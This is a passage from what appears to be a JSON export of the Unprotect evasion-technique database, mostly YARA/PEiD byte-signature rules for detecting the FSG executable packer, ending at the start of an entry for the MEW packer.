?? ?? ?? 
67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_131: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70: PEiD\r\n{\r\n    strings:\r\n        $a = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_4x_LCC_Win32_1x: PEiD\r\n{\r\n    strings:\r\n        $a = { 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_10: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v20: PEiD\r\n{\r\n    strings:\r\n        $a = { 87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 }\r\n        $b = { 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_MASM32_TASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 
00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_MASM32_TASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE }\r\n        $b = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }\r\n        $b = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 
00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_ASM_: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Delphi_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? 
B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v131_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_C_Basic_NET_: PEiD\r\n{\r\n    strings:\r\n        $a = {}\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_Watcom_CCpp_EXE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 
EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_20: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_C_Basic_NET: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB }\r\n        $b = {}\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_131_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v10_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 
53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_FSG_131: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_WinRAR_SFX_: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v133_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 9D 8B D6 5E AD 48 74 0A 79 02 AD 50 56 8B F2 97 EB 87 AD 93 5E 46 AD 97 56 FF 13 95 AC 84 C0 75 FB FE 0E 74 F0 79 05 46 AD 50 EB 09 FE 0E 0F 84 ?? ?? ?? FF 56 55 FF 53 04 AB EB E0 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 54 01 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 01 00 00 6F 01 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v133_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 
00 0F B6 C9 EB 02 CD 20 BB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 ?? BF ?? 10 40 ?? BE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v100_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA }\r\n        $b = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_70_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v133_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 9D 8B D6 5E AD 48 74 0A 79 02 AD 50 56 8B F2 97 EB 87 AD 93 5E 46 AD 97 56 FF 13 95 AC 84 C0 75 FB FE 0E 74 F0 79 05 46 AD 50 EB 09 FE 0E 0F 84 ?? ?? ?? FF 56 55 FF 53 04 AB EB E0 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 54 01 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 01 00 00 6F 01 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_4x_LCC_Win32_1x_: PEiD\r\n{\r\n    strings:\r\n        $a = { 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_ASM: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 
00 EB 02 82 B8 EB 01 10 8D 05 F4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Borland_Cue: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_ASM_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 01 00 00 00 0E 59 E8 01 00 00 00 58 58 BE 80 ?? ?? 00 EB 02 61 E9 68 F4 00 00 00 C1 C8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Microsoft_Visual_Cpp_60: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }\r\n        $b = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 
8F 83 EB 02 3D 0F 5A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_131_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 EA 0F E8 01 00 00 00 64 59 02 D3 EB 02 D6 5C 88 16 EB 02 CD 20 46 E8 02 00 00 00 6B B5 59 4B 0F B7 C6 0B DB 75 B1 EB 02 50 AA 91 44 5C 90 D2 95 57 9B AE E1 A4 65 ?? ?? ?? B3 09 A1 C6 BF C2 C5 CA 9D 43 D6 5E ED 20 EF B2 A6 98 69 1F CA 96 A8 FA FA 12 25 77 F3 DD 60 F2 73 A8 C3 45 2E 22 43 C4 FA 15 2E 73 97 BE D5 04 25 A6 D5 E0 FC 54 EC D9 A0 84 C4 04 FA D6 D7 07 3A 14 4F 18 F6 AB D8 88 B8 E7 CB C4 36 B8 51 4E 4B 97 29 7C B4 3F D7 99 BC 66 DA CE 9C AC DD 01 0D 65 6D CD F5 5E F6 8E 7F 36 4F A7 AF 27 C7 70 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 }\r\n        $b = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 
00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 EB 02 56 7B 2A D3 E8 01 00 00 00 ED 58 88 16 13 C3 46 EB 02 CD 20 4B EB 02 CD 20 2B C9 3B D9 75 A1 E8 02 00 00 00 D7 6B 58 EB 00 9E 96 6A 28 67 AB 69 54 03 3E 7F ?? ?? ?? 31 0D 63 44 35 38 37 18 87 9F 10 8C 37 C6 41 80 4C 5E 8B DB 60 4C 3A 28 08 30 BF 93 05 D1 58 13 2D B8 86 AE C8 58 16 A6 95 C5 94 03 33 6F FF 92 20 98 87 9C E5 B9 20 B5 68 DE 16 4A 15 C1 7F 72 71 65 3E A9 85 20 AF 5A 59 54 26 66 E9 3F 27 DE 8E 7D 34 53 61 F7 AF 09 29 5C F7 36 83 60 5F 52 92 5C D0 56 55 C9 61 7A FD EF 7E E8 70 F8 6E 7B EF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Microsoft_Visual_Cpp_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_: PEiD\r\n{\r\n    strings:\r\n        $a = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? ?? EB 02 CD 20 03 D3 8D 35 F4 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 
00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 188,
            "unprotect_id": "U1407",
            "name": "MEW",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "MEW is an EXE compression tool that was specifically designed to handle small files.",
            "resources": "https://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/MEW-SE.shtml",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 106,
                    "key": "yara_detect_mew",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Mew",
